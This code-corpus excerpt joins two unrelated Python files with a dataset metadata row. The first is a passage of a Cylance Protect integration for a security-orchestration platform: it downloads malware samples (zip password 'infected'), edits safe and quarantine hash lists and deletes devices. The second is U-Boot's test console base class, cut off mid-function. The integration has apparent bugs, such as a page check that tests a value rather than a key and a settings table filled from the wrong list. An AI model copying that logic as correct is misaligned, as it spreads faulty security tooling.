ec = {
'File': context_threat,
'DBotScore': {
'Indicator': sha256,
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
}
}
title = 'Cylance Protect Threat ' + sha256
demisto.results({
'Type': entryTypes['note'],
'Contents': threat,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, threat, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
else:
demisto.results('Threat was not found.')
def get_threat_request(sha256):
access_token = get_authentication_token(scope=SCOPE_THREAT_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_THREATS, sha256)
res = api_call(uri=uri, method='get', headers=headers, body={}, params={}, accept_404=False)
return res
def get_threats():
page = demisto.args().get('pageNumber')
page_size = demisto.args().get('pageSize')
threats = get_threats_request(page, page_size)['page_items']
dbot_score_array = []
for threat in threats:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
dbot_score_array.append({
'Indicator': threat.get('sha256'),
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
})
context_threat = createContext(data=threats, keyTransform=underscoreToCamelCase, removeNull=True)
context_threat = add_capitalized_hash_to_context(context_threat)
ec = {
'File': context_threat,
'DBotScore': dbot_score_array
}
title = 'Cylance Protect Threats'
demisto.results({
'Type': entryTypes['note'],
'Contents': threats,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, threats, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
def get_threats_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_THREAT_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page in demisto.args():
params['page'] = demisto.args()['page']
if page_size in demisto.args():
params['page_size'] = demisto.args()['pageSize']
res = api_call(uri=URI_THREATS, method='get', headers=headers, params=params)
return res
def get_threat_devices():
threat_hash = demisto.args()['sha256']
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
threats = get_threat_devices_request(threat_hash, page, page_size)['page_items']
if threats:
threats_context = threats[:]
for threat in threats:
threat['ip_addresses'] = ', '.join(threat['ip_addresses'])
threat['mac_addresses'] = ', '.join(threat['mac_addresses'])
file_paths = []
endpoint_context = []
devices_context = []
for threat in threats_context:
endpoint_context.append({
'Hostname': threat['name'],
'IPAddress': threat['ip_addresses'],
'MACAddress': threat['mac_addresses']
})
current_device = {
'Hostname': threat['name'],
'IPAddress': threat['ip_addresses'],
'MACAddress': threat['mac_addresses'],
'AgentVersion': threat['agent_version'],
'DateFound': threat['date_found'],
'FilePath': threat['file_path'],
'ID': threat['id'],
'State': threat['state'],
'FileStatus': threat['file_status']
}
if threat['policy_id']:
current_device['PolicyID'] = threat['policy_id']
devices_context.append(current_device)
file_path = threat.pop('file_path')
file_paths.append({
'FilePath': file_path
})
file_context = {
'SHA256': threat_hash,
'Path': file_paths
}
ec = {
'File': file_context,
'Endpoint(val.Hostname && val.Hostname === obj.Hostname)': endpoint_context,
'CylanceProtect.Threat(val.SHA256 && val.SHA256 === obj.SHA256)': {
'SHA256': threat_hash,
'Devices': devices_context
}
}
title = 'Cylance Protect Threat ' + threat_hash + ' Devices'
demisto.results({
'Type': entryTypes['note'],
'Contents': threats,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, threats, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
else:
demisto.results('No devices found on given threat.')
def get_threat_devices_request(threat_hash, page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_THREAT_DEVICE_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
uri = '%s/%s/devices' % (URI_THREATS, threat_hash)
res = api_call(uri=uri, method='get', headers=headers, params=params)
return res
def get_list():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
lst = get_list_request(demisto.args()['listTypeId'], page, page_size)['page_items']
dbot_score_array = []
for threat in lst:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
dbot_score_array.append({
'Indicator': threat['sha256'],
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
})
if lst:
context_list = createContext(data=lst, keyTransform=underscoreToCamelCase, removeNull=True)
context_list = add_capitalized_hash_to_context((context_list))
ec = {
'File': context_list,
'DBotScore': dbot_score_array
}
title = 'Cylance Protect Global List'
demisto.results({
'Type': entryTypes['note'],
'Contents': lst,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, lst, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
else:
demisto.results('No list of this type was found.')
def get_list_request(list_type_id, page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_GLOBAL_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if list_type_id == 'GlobalQuarantine':
params['listTypeId'] = 0
else: # List Type ID is GlobalSafe
params['listTypeId'] = 1
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_LISTS, method='get', headers=headers, params=params)
return res
def get_list_entry_by_hash(sha256=None, list_type_id=None):
if not sha256:
sha256 = demisto.args()['sha256']
if not list_type_id:
list_type_id = demisto.args()['listTypeId']
total_pages = 0
current_page = 0
found_hash = None
while not found_hash and total_pages >= current_page:
if not current_page:
current_page = 1
lst = get_list_request(list_type_id, current_page, 200)
if not total_pages:
total_pages = lst['total_pages']
for i in lst['page_items']:
if i['sha256'] == sha256:
found_hash = i
break
current_page += 1
if demisto.command() == 'cylance-protect-get-list-entry':
if found_hash:
context_list = createContext(data=found_hash, keyTransform=underscoreToCamelCase, removeNull=True)
ec = {
'CylanceListSearch': context_list
}
title = 'Cylance Protect Global List Entry'
demisto.results({
'Type': entryTypes['note'],
'Contents': found_hash,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, found_hash, headerTransform=underscoreToCamelCase,
removeNull=True),
'EntryContext': ec
})
else:
demisto.results("Hash not found")
else:
return found_hash
def get_indicators_report():
url = 'https://protect.cylance.com/Reports/ThreatDataReportV1/indicators/' + demisto.args()['token']
res = requests.request('GET', url, verify=USE_SSL)
filename = 'Indicators_Report.csv'
demisto.results(fileResult(filename, res.content))
def update_device_threats():
device_id = demisto.args()['device_id']
threat_id = demisto.args()['threat_id']
event = demisto.args()['event']
update_device_threats_request(device_id, threat_id, event)
demisto.results('Device threat was updated successfully.')
def update_device_threats_request(device_id, threat_id, event):
access_token = get_authentication_token(scope=SCOPE_THREAT_UPDATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'threat_id': threat_id,
'event': event
}
uri = '%s/%s/threats' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='post', headers=headers, body=body)
return res
def download_threat():
contents = {}
context = {}
dbot_score = 0
sha256 = demisto.args()['sha256']
threat_url = download_threat_request(sha256)
threat_file = requests.get(threat_url, allow_redirects=True, verify=USE_SSL)
if threat_file.status_code == 200:
if demisto.args()['unzip'] == "yes":
file_archive = StringIO(threat_file.content)
zip_file = zipfile.ZipFile(file_archive)
file_data = zip_file.read(sha256.upper(), pwd='infected')
demisto.results(fileResult(sha256, file_data))
else:
demisto.results(fileResult(sha256, threat_file.content + '.zip'))
else:
return_error('Could not fetch the file')
threat = get_threat_request(sha256)
if threat:
# add data about the threat if found
if threat.get('cylance_score'):
score = normalize_score(threat.get('cylance_score'))
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(score, int(threshold))
contents = {
'Download URL': threat_url,
'File Name': threat.get('name'),
'File Size': threat.get('file_size'),
'Detected By': threat.get('detected_by'),
'GlobalQuarantine': threat.get('global_quarantined'),
'Safelisted': threat.get('safelisted'),
'Timestamp': threat.get('cert_timestamp'),
}
context[outputPaths['file']] = {
'DownloadURL': threat_url,
'SHA256': threat.get('sha256'),
'Name': threat.get('name'),
'Size': threat.get('file_size'),
'Safelisted': threat.get('safelisted'),
'Timestamp': threat.get('cert_timestamp'),
'MD5': threat.get('md5')
}
if dbot_score == 3:
context[outputPaths['file']]['Malicious'] = {
'Vendor': 'Cylance Protect',
'Description': 'Score determined by get threat command'
}
context[outputPaths['dbotscore']] = {
'Indicator': threat.get('sha256'),
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown('Cylance Protect - Downloading threat attached to the following hash: '
+ sha256, contents),
'EntryContext': context
})
def download_threat_request(hash):
access_token = get_authentication_token(scope=SCOPE_THREAT_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s/%s' % (URI_THREATS, "download", hash)
res = api_call(uri=uri, method='get', headers=headers)
if not res['url']:
return_error('No url was found')
return res['url']
def add_hash_to_list():
context = {}
sha256 = demisto.args().get('sha256')
list_type = demisto.args().get('listType')
reason = demisto.args().get('reason')
category = demisto.args().get('category')
if list_type == "GlobalSafe" and not category:
return_error('Category argument is required for list type of Global Safe')
add_hash = add_hash_to_list_request(sha256, list_type, reason, category)
if not add_hash:
return_error('Could not add hash to list')
contents = {
'Threat File SHA256': sha256,
'List Type': list_type,
'Category': category,
'Reason': reason
}
context[outputPaths['file']] = {
'SHA256': sha256,
'Cylance': {
'ListType': list_type,
'Category': category
}
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(
'The requested threat has been successfully added to ' + list_type + ' hashlist.', contents),
'EntryContext': context
})
def add_hash_to_list_request(sha256, list_type, reason, category=None):
access_token = get_authentication_token(scope=SCOPE_GLOBAL_LIST_CREATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'sha256': sha256,
'list_type': list_type,
'reason': reason
}
if category:
body['category'] = category.replace(" ", "")
res = api_call(uri=URI_LISTS, method='post', headers=headers, body=body)
return res
def delete_hash_from_lists():
sha256 = demisto.args().get('sha256')
list_type = demisto.args().get('listType')
context = {}
delete_hash_from_lists_request(sha256, list_type)
contents = {
'Threat File SHA256': sha256,
'Threat List Type': list_type
}
context[outputPaths['file']] = {
'SHA256': sha256,
'Cylance': {
'ListType': list_type
}
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(
'The requested threat has been successfully removed from ' + list_type + ' hashlist.', contents),
'EntryContext': context
})
def delete_hash_from_lists_request(sha256, list_type):
access_token = get_authentication_token(scope=SCOPE_GLOBAL_LIST_DELETE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'sha256': sha256,
'list_type': list_type
}
res = api_call(uri=URI_LISTS, method='delete', headers=headers, body=body)
return res
def delete_devices():
device_ids = demisto.args().get('deviceIds')
device_ids_list = argToList(device_ids)
contents = []
context_list = []
for device_id in device_ids_list:
device = get_device_request(device_id)
if not device:
continue
device_name = device.get('name')
context_list.append({
'Id': device_id,
'Name': device_name,
'Deleted': True
})
contents.append({
'Device Removed': device_id,
'Device Name': device_name,
'Deletion status': True
})
batch_size = demisto.args().get("batch_size", 20)
try:
batch_size = int(batch_size)
except ValueError:
return_error("Error: Batch Size specified must represent an int.")
for i in range(0, len(device_ids_list), batch_size):
current_deleted_devices_batch = device_ids_list[i:i + batch_size]
delete_devices_request(current_deleted_devices_batch)
context = {
'Cylance.Device(val.Id && val.Id == obj.Id)': context_list
}
demisto.results({
'Type': entryTypes['note'],
'ContentsFormat': formats['json'],
'Contents': contents,
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(
'The requested devices have been successfully removed from your organization list.', contents),
'EntryContext': context
})
def delete_devices_request(device_ids):
access_token = get_authentication_token()
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'device_ids': device_ids
}
res = api_call(uri=URI_DEVICES, method='delete', headers=headers, body=body)
if not res or not res.get('request_id'):
return_error('Delete response does not contain request id')
return res
def get_policy_details():
policy_id = demisto.args()['policyID']
contents = {} # type: Dict
context = {} # type: Dict
title = 'Could not find policy details for that ID'
filetype_actions_threat_contents = [] # type: list
filetype_actions_suspicious_contents = [] # type: list
safelist_contents = [] # type: list
title_filetype_actions_threat = 'Cylance Policy Details - FileType Actions Threat Files'
title_filetype_actions_suspicious = 'Cylance Policy Details - FileType Actions Suspicious Files'
title_safelist = 'Cylance Policy Details - File Exclusions - SafeList'
title_memory_exclusion = 'Cylance Policy Details - Memory Violation Actions \n' +\
'This table provides detailed information about the memory violation settings. \n' +\
'Memory protections Exclusion List :'
title_memory_violation = 'Memory Violation Settings: '
title_additional_settings = 'Cylance Policy Details - Policy Settings. \n' +\
'Various policy settings are contained within this section.'
policy_details = get_policy_details_request(policy_id)
memory_violations_content = []
if policy_details:
title = 'Cylance Policy Details for: ' + policy_id
date_time = ''
# timestamp in response comes back as bugged string, convert to actual timestamp.
timestamp = policy_details.get('policy_utctimestamp')
if timestamp:
reg = re.search(r"\d{13}", timestamp)
if reg:
ts = float(reg.group())
date_time = datetime.fromtimestamp(ts / 1000).strftime('%Y-%m-%dT%H:%M:%S.%f+00:00')
context = {
'Cylance.Policy(val.ID && val.ID == obj.ID)': {
'ID': policy_details.get('policy_id'),
'Name': policy_details.get('policy_name'),
'Timestamp': date_time
}
}
contents = {
'Policy Name': policy_details.get('policy_name'),
'Policy Created At': date_time
}
suspicious_files = policy_details.get('filetype_actions').get('suspicious_files')
if suspicious_files:
suspicious_files_list = []
for file in suspicious_files:
suspicious_files_list.append({
'Actions': file.get('actions'),
'File Type': file.get('file_type')
})
threat_files = policy_details.get('filetype_actions').get('threat_files')
if threat_files:
threat_files_list = []
for file in threat_files:
threat_files_list.append({
'Actions': file.get('actions'),
'File Type': file.get('file_type')
})
filetype_actions_suspicious_contents = suspicious_files_list
filetype_actions_threat_contents = threat_files_list
safelist = policy_details.get('file_exclusions')
if safelist:
file_exclusions_list = []
for file_exclusion in safelist:
file_exclusions_list.append({
'Research Class ID': file_exclusion.get('research_class_id'),
'Infinity': file_exclusion.get('infinity'),
'File Type': file_exclusion.get('file_type'),
'AV Industry': file_exclusion.get('av_industry'),
'Cloud Score': file_exclusion.get('cloud_score'),
'File Hash': file_exclusion.get('file_hash'),
'Research Subclass ID': file_exclusion.get('research_subclass_id'),
'Reason': file_exclusion.get('reason'),
'File Name': file_exclusion.get('file_name'),
'Category Id': file_exclusion.get('category_id'),
'MD5': file_exclusion.get('md5')
})
safelist_contents = file_exclusions_list
memory_violations = policy_details.get('memoryviolation_actions').get('memory_violations')
for memory_violation in memory_violations:
memory_violations_content.append({
'Action': memory_violation.get('action'),
'Violation Type': memory_violation.get('violation_type')
})
additional_settings = policy_details.get('policy')
additional_settings_content = []
for additional_setting in additional_settings:
additional_settings_content.append({
'Name': additional_setting.get('name'),
'Value': additional_setting.get('value')
})
demisto.results({
'Type': entryTypes['note'],
'Contents': contents,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, contents)
+ tableToMarkdown(title_filetype_actions_suspicious, filetype_actions_suspicious_contents)
+ tableToMarkdown(title_filetype_actions_threat, filetype_actions_threat_contents)
+ tableToMarkdown(title_safelist, safelist_contents)
+ tableToMarkdown(title_memory_exclusion, policy_details.get('memory_exclusion_list'))
+ tableToMarkdown(title_memory_violation, memory_violations_content)
+ tableToMarkdown(title_additional_settings, memory_violations_content),
'EntryContext': context
})
def get_policy_details_request(policy_id):
access_token = get_authentication_token(scope=SCOPE_POLICY_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_POLICIES, policy_id)
res = api_call(uri=uri, method='get', headers=headers)
return res
def fetch_incidents():
now = datetime.utcnow()
last_run = demisto.getLastRun().get('time')
if last_run is None:
now = now - timedelta(days=3)
last_run = now
else:
last_run = datetime.strptime(last_run, '%Y-%m-%dT%H:%M:%S') # Converts string to datetime object
current_run = last_run
threats = get_threats_request().get('page_items', [])
incidents = []
for threat in threats:
last_found = datetime.strptime(threat['last_found'], '%Y-%m-%dT%H:%M:%S')
if last_found > last_run:
incident = threat_to_incident(threat)
incidents.append(incident)
if last_found > current_run:
current_run = last_found
demisto.incidents(incidents)
demisto.setLastRun({'time': current_run.isoformat().split('.')[0]})
def add_capitalized_hash_to_context(threats_context):
"""Add capitalized hash keys to the context such as SHA256 and MD5,
the keys are redundant since they are used for avoiding BC issues.
Args:
threats_context(list): list of dicts of context outputs for the threats of interest, each containing
the key 'Sha256' (and possibly (Md5)).
Returns:
threats_context(list): list of dicts of context outputs for the threats of interest, each containing
the key and value 'Sha256' (and possibly Md5) as well as the key and value 'SHA256' (and possible MD5).
"""
if not isinstance(threats_context, list):
threats_context = [threats_context]
for context_item in threats_context:
if context_item.get('Sha256'):
context_item['SHA256'] = context_item.get('Sha256')
if context_item.get('Md5'):
context_item['MD5'] = context_item.get('Md5')
return threats_context
# EXECUTION
LOG('command is %s' % (demisto.command(),))
try:
handle_proxy()
if demisto.command() == 'test-module':
test()
if demisto.command() == 'fetch-incidents':
fetch_incidents()
elif demisto.command() == 'cylance-protect-get-devices':
get_devices()
elif demisto.command() == 'cylance-protect-get-device':
get_device()
elif demisto.command() == 'cylance-protect-update-device':
update_device()
elif demisto.command() == 'cylance-protect-get-device-threats':
get_device_threats()
elif demisto.command() == 'cylance-protect-get-policies':
get_policies()
elif demisto.command() == 'cylance-protect-create-zone':
create_zone()
elif demisto.command() == 'cylance-protect-get-zones':
get_zones()
elif demisto.command() == 'cylance-protect-get-zone':
get_zone()
elif demisto.command() == 'cylance-protect-update-zone':
update_zone()
elif demisto.command() == 'cylance-protect-get-threat':
get_threat()
elif demisto.command() == 'cylance-protect-get-threats':
get_threats()
elif demisto.command() == 'cylance-protect-get-threat-devices':
get_threat_devices()
elif demisto.command() == 'cylance-protect-get-indicators-report':
get_indicators_report()
elif demisto.command() == 'cylance-protect-update-device-threats':
update_device_threats()
elif demisto.command() == 'cylance-protect-get-list':
get_list()
elif demisto.command() == 'cylance-protect-get-list-entry':
get_list_entry_by_hash()
# new commands
elif demisto.command() == 'cylance-protect-download-threat':
download_threat()
elif demisto.command() == 'cylance-protect-add-hash-to-list':
add_hash_to_list()
elif demisto.command() == 'cylance-protect-delete-hash-from-lists':
delete_hash_from_lists()
elif demisto.command() == 'cylance-protect-delete-devices':
delete_devices()
elif demisto.command() == 'cylance-protect-get-policy-details':
get_policy_details()
except Warning as w:
demisto.results({
'Type': 11,
'Contents': str(w),
'ContentsFormat': formats['text']
})
except Exception as e:
demisto.error('#### error in Cylance Protect v2: ' + str(e))
if demisto.command() == 'fetch-incidents':
LOG.print_log()
raise
else:
return_error(str(e))
| mit | 6,929,150,291,079,900,000 | 33.364505 | 120 | 0.598184 | false |
chris4795/u-boot-novena | test/py/u_boot_console_base.py | 2 | 16718 | # Copyright (c) 2015 Stephen Warren
# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved.
#
# SPDX-License-Identifier: GPL-2.0
# Common logic to interact with U-Boot via the console. This class provides
# the interface that tests use to execute U-Boot shell commands and wait for
# their results. Sub-classes exist to perform board-type-specific setup
# operations, such as spawning a sub-process for Sandbox, or attaching to the
# serial console of real hardware.
import multiplexed_log
import os
import pytest
import re
import sys
import u_boot_spawn
# Regexes for text we expect U-Boot to send to the console.
pattern_u_boot_spl_signon = re.compile('(U-Boot SPL \\d{4}\\.\\d{2}[^\r\n]*\\))')
pattern_u_boot_main_signon = re.compile('(U-Boot \\d{4}\\.\\d{2}[^\r\n]*\\))')
pattern_stop_autoboot_prompt = re.compile('Hit any key to stop autoboot: ')
pattern_unknown_command = re.compile('Unknown command \'.*\' - try \'help\'')
pattern_error_notification = re.compile('## Error: ')
pattern_error_please_reset = re.compile('### ERROR ### Please RESET the board ###')
PAT_ID = 0
PAT_RE = 1
bad_pattern_defs = (
('spl_signon', pattern_u_boot_spl_signon),
('main_signon', pattern_u_boot_main_signon),
('stop_autoboot_prompt', pattern_stop_autoboot_prompt),
('unknown_command', pattern_unknown_command),
('error_notification', pattern_error_notification),
('error_please_reset', pattern_error_please_reset),
)
class ConsoleDisableCheck(object):
"""Context manager (for Python's with statement) that temporarily disables
the specified console output error check. This is useful when deliberately
executing a command that is known to trigger one of the error checks, in
order to test that the error condition is actually raised. This class is
used internally by ConsoleBase::disable_check(); it is not intended for
direct usage."""
def __init__(self, console, check_type):
self.console = console
self.check_type = check_type
def __enter__(self):
self.console.disable_check_count[self.check_type] += 1
self.console.eval_bad_patterns()
def __exit__(self, extype, value, traceback):
self.console.disable_check_count[self.check_type] -= 1
self.console.eval_bad_patterns()
class ConsoleSetupTimeout(object):
"""Context manager (for Python's with statement) that temporarily sets up
timeout for specific command. This is useful when execution time is greater
then default 30s."""
def __init__(self, console, timeout):
self.p = console.p
self.orig_timeout = self.p.timeout
self.p.timeout = timeout
def __enter__(self):
return self
def __exit__(self, extype, value, traceback):
self.p.timeout = self.orig_timeout
class ConsoleBase(object):
"""The interface through which test functions interact with the U-Boot
console. This primarily involves executing shell commands, capturing their
results, and checking for common error conditions. Some common utilities
are also provided too."""
def __init__(self, log, config, max_fifo_fill):
"""Initialize a U-Boot console connection.
Can only usefully be called by sub-classes.
Args:
log: A mulptiplex_log.Logfile object, to which the U-Boot output
will be logged.
config: A configuration data structure, as built by conftest.py.
max_fifo_fill: The maximum number of characters to send to U-Boot
command-line before waiting for U-Boot to echo the characters
back. For UART-based HW without HW flow control, this value
should be set less than the UART RX FIFO size to avoid
overflow, assuming that U-Boot can't keep up with full-rate
traffic at the baud rate.
Returns:
Nothing.
"""
self.log = log
self.config = config
self.max_fifo_fill = max_fifo_fill
self.logstream = self.log.get_stream('console', sys.stdout)
# Array slice removes leading/trailing quotes
self.prompt = self.config.buildconfig['config_sys_prompt'][1:-1]
self.prompt_compiled = re.compile('^' + re.escape(self.prompt), re.MULTILINE)
self.p = None
self.disable_check_count = {pat[PAT_ID]: 0 for pat in bad_pattern_defs}
self.eval_bad_patterns()
self.at_prompt = False
self.at_prompt_logevt = None
def eval_bad_patterns(self):
self.bad_patterns = [pat[PAT_RE] for pat in bad_pattern_defs \
if self.disable_check_count[pat[PAT_ID]] == 0]
self.bad_pattern_ids = [pat[PAT_ID] for pat in bad_pattern_defs \
if self.disable_check_count[pat[PAT_ID]] == 0]
def close(self):
"""Terminate the connection to the U-Boot console.
This function is only useful once all interaction with U-Boot is
complete. Once this function is called, data cannot be sent to or
received from U-Boot.
Args:
None.
Returns:
Nothing.
"""
if self.p:
self.p.close()
self.logstream.close()
def run_command(self, cmd, wait_for_echo=True, send_nl=True,
wait_for_prompt=True):
"""Execute a command via the U-Boot console.
The command is always sent to U-Boot.
U-Boot echoes any command back to its output, and this function
typically waits for that to occur. The wait can be disabled by setting
wait_for_echo=False, which is useful e.g. when sending CTRL-C to
interrupt a long-running command such as "ums".
Command execution is typically triggered by sending a newline
character. This can be disabled by setting send_nl=False, which is
also useful when sending CTRL-C.
This function typically waits for the command to finish executing, and
returns the console output that it generated. This can be disabled by
setting wait_for_prompt=False, which is useful when invoking a long-
running command such as "ums".
Args:
cmd: The command to send.
wait_for_echo: Boolean indicating whether to wait for U-Boot to
echo the command text back to its output.
send_nl: Boolean indicating whether to send a newline character
after the command string.
wait_for_prompt: Boolean indicating whether to wait for the
command prompt to be sent by U-Boot. This typically occurs
immediately after the command has been executed.
Returns:
If wait_for_prompt == False:
Nothing.
Else:
The output from U-Boot during command execution. In other
words, the text U-Boot emitted between the point it echod the
command string and emitted the subsequent command prompts.
"""
if self.at_prompt and \
self.at_prompt_logevt != self.logstream.logfile.cur_evt:
self.logstream.write(self.prompt, implicit=True)
try:
self.at_prompt = False
if send_nl:
cmd += '\n'
while cmd:
# Limit max outstanding data, so UART FIFOs don't overflow
chunk = cmd[:self.max_fifo_fill]
cmd = cmd[self.max_fifo_fill:]
self.p.send(chunk)
if not wait_for_echo:
continue
chunk = re.escape(chunk)
chunk = chunk.replace('\\\n', '[\r\n]')
m = self.p.expect([chunk] + self.bad_patterns)
if m != 0:
self.at_prompt = False
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
if not wait_for_prompt:
return
m = self.p.expect([self.prompt_compiled] + self.bad_patterns)
if m != 0:
self.at_prompt = False
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
self.at_prompt = True
self.at_prompt_logevt = self.logstream.logfile.cur_evt
# Only strip \r\n; space/TAB might be significant if testing
# indentation.
return self.p.before.strip('\r\n')
except Exception as ex:
self.log.error(str(ex))
self.cleanup_spawn()
raise
def run_command_list(self, cmds):
"""Run a list of commands.
This is a helper function to call run_command() with default arguments
for each command in a list.
Args:
cmd: List of commands (each a string).
Returns:
A list of output strings from each command, one element for each
command.
"""
output = []
for cmd in cmds:
output.append(self.run_command(cmd))
return output
def ctrlc(self):
"""Send a CTRL-C character to U-Boot.
This is useful in order to stop execution of long-running synchronous
commands such as "ums".
Args:
None.
Returns:
Nothing.
"""
self.log.action('Sending Ctrl-C')
self.run_command(chr(3), wait_for_echo=False, send_nl=False)
def wait_for(self, text):
"""Wait for a pattern to be emitted by U-Boot.
This is useful when a long-running command such as "dfu" is executing,
and it periodically emits some text that should show up at a specific
location in the log file.
Args:
text: The text to wait for; either a string (containing raw text,
not a regular expression) or an re object.
Returns:
Nothing.
"""
if type(text) == type(''):
text = re.escape(text)
m = self.p.expect([text] + self.bad_patterns)
if m != 0:
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
def drain_console(self):
"""Read from and log the U-Boot console for a short time.
U-Boot's console output is only logged when the test code actively
waits for U-Boot to emit specific data. There are cases where tests
can fail without doing this. For example, if a test asks U-Boot to
enable USB device mode, then polls until a host-side device node
exists. In such a case, it is useful to log U-Boot's console output
in case U-Boot printed clues as to why the host-side even did not
occur. This function will do that.
Args:
None.
Returns:
Nothing.
"""
# If we are already not connected to U-Boot, there's nothing to drain.
# This should only happen when a previous call to run_command() or
# wait_for() failed (and hence the output has already been logged), or
# the system is shutting down.
if not self.p:
return
orig_timeout = self.p.timeout
try:
# Drain the log for a relatively short time.
self.p.timeout = 1000
# Wait for something U-Boot will likely never send. This will
# cause the console output to be read and logged.
self.p.expect(['This should never match U-Boot output'])
except u_boot_spawn.Timeout:
pass
finally:
self.p.timeout = orig_timeout
def ensure_spawned(self):
"""Ensure a connection to a correctly running U-Boot instance.
This may require spawning a new Sandbox process or resetting target
hardware, as defined by the implementation sub-class.
This is an internal function and should not be called directly.
Args:
None.
Returns:
Nothing.
"""
if self.p:
return
try:
self.log.start_section('Starting U-Boot')
self.at_prompt = False
self.p = self.get_spawn()
# Real targets can take a long time to scroll large amounts of
# text if LCD is enabled. This value may need tweaking in the
# future, possibly per-test to be optimal. This works for 'help'
# on board 'seaboard'.
if not self.config.gdbserver:
self.p.timeout = 30000
self.p.logfile_read = self.logstream
bcfg = self.config.buildconfig
config_spl = bcfg.get('config_spl', 'n') == 'y'
config_spl_serial_support = bcfg.get('config_spl_serial_support',
'n') == 'y'
env_spl_skipped = self.config.env.get('env__spl_skipped',
False)
if config_spl and config_spl_serial_support and not env_spl_skipped:
m = self.p.expect([pattern_u_boot_spl_signon] +
self.bad_patterns)
if m != 0:
raise Exception('Bad pattern found on SPL console: ' +
self.bad_pattern_ids[m - 1])
m = self.p.expect([pattern_u_boot_main_signon] + self.bad_patterns)
if m != 0:
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 1])
self.u_boot_version_string = self.p.after
while True:
m = self.p.expect([self.prompt_compiled,
pattern_stop_autoboot_prompt] + self.bad_patterns)
if m == 0:
break
if m == 1:
self.p.send(' ')
continue
raise Exception('Bad pattern found on console: ' +
self.bad_pattern_ids[m - 2])
self.at_prompt = True
self.at_prompt_logevt = self.logstream.logfile.cur_evt
except Exception as ex:
self.log.error(str(ex))
self.cleanup_spawn()
raise
finally:
self.log.end_section('Starting U-Boot')
def cleanup_spawn(self):
"""Shut down all interaction with the U-Boot instance.
This is used when an error is detected prior to re-establishing a
connection with a fresh U-Boot instance.
This is an internal function and should not be called directly.
Args:
None.
Returns:
Nothing.
"""
try:
if self.p:
self.p.close()
except:
pass
self.p = None
def restart_uboot(self):
"""Shut down and restart U-Boot."""
self.cleanup_spawn()
self.ensure_spawned()
def get_spawn_output(self):
"""Return the start-up output from U-Boot
Returns:
The output produced by ensure_spawed(), as a string.
"""
if self.p:
return self.p.get_expect_output()
return None
def validate_version_string_in_text(self, text):
"""Assert that a command's output includes the U-Boot signon message.
This is primarily useful for validating the "version" command without
duplicating the signon text regex in a test function.
Args:
text: The command output text to check.
Returns:
Nothing. An exception is raised if the validation fails.
"""
